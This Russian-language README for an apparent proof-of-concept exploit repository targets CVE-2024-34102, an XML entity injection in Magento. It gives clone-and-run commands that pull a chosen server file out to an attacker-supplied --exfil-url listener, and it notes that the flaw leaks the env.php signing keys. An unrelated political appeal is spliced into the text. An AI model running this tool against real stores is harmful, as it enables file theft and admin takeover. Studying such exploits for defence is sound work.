
Proof-of-concept эксплойт для CVE-2024-34102, критической инъекции XML-сущностей в Magento, позволяющей выгрузку конфиденциальных файлов и несанкционированный доступ к администратору. Только для образовательных целей.
Мы требуем безопасного возвращения всех граждан, взятых в заложники террористической группировкой ХАМАС. Мы не успокоимся, пока каждый заложник не будет освобождён и не вернётся домой в безопасности. Вы можете помочь вернуть их домой. https://stories.bringthemhomenow.net/
Этот репозиторий содержит proof-of-concept (PoC) эксплойт для критической уязвимости внедрения XML-сущностей (CVE-2024-34102) в Magento. Эта уязвимость позволяет извлекать конфиденциальные файлы, которые затем могут быть использованы для получения несанкционированного доступа к административным функциям Magento. Данный эксплойт предназначен для образовательных целей и должен использоваться ответственно.
Magento — одно из самых популярных решений для электронной коммерции, используемых по всему миру. В июне 2024 года была обнаружена критическая уязвимость внедрения XML-сущностей без предварительной аутентификации, идентифицированная как CVE-2024-34102. Эта уязвимость может привести к серьёзным последствиям, включая извлечение файла app/etc/env.php из Magento, который содержит криптографические ключи, используемые для подписи JWT.
requests (pip install requests)Клонируйте репозиторий:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
Выполните скрипт с необходимыми аргументами:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: URL целевого экземпляра Magento.--target-file: путь к файлу на целевом сервере для извлечения.--exfil-url: URL для получения извлечённых данных.python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999